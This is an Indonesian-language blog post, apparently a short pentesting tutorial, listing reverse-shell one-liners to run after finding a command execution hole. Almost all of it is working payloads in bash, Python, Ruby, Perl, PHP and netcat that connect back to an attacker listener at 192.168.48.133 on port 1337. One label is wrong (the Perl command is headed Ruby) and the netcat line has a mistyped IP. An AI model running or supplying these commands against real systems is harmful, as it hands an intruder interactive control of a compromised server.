hallo cuy kembali lagi sama admin wkwk.. admin akan membahas beberapa cara untuk mendapatkan shell interaktif ketika kita berhasil menemukan celah Command Execution Vulnerability saat melakukan penetration testing. Pilihan kita untuk melakukan reverse shell terbatas pada bahasa pemrograman apa yang terinstall di server target. Nah kali ini saya akan membahas beberapa opsi / command untuk melakukan reverse shell dari php, python, ruby, dll.
* reverse dari bash
bash -i >& /dev/tcp/192.168.48.133/1337 0>&1
* reverse menggunakan python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.48.133",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
* reverse menggunakan ruby
ruby -rsocket -e'f=TCPSocket.open("192.168.48.133",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
* reverse shell meggunakan ruby
perl -e 'use Socket;$i="192.168.48.133";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
* revere shell menggunakan php
php -r '$sock=fsockopen("192.168.48.133",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
* reverse shell menggunakan netcat
/bin/nc.traditional -e /bin/sh 92.168.48.133 1337
note : 192.168.48.133 adalah ip attacker. 1337 adalah port yang kita buka sebelumnya di command listening
Kesimpulan :
Kita bisa melakukan backconnect dengan apa saja asalhakn mendukung socket. Nah sekian tutorial kali ini, semoga bermanfaat
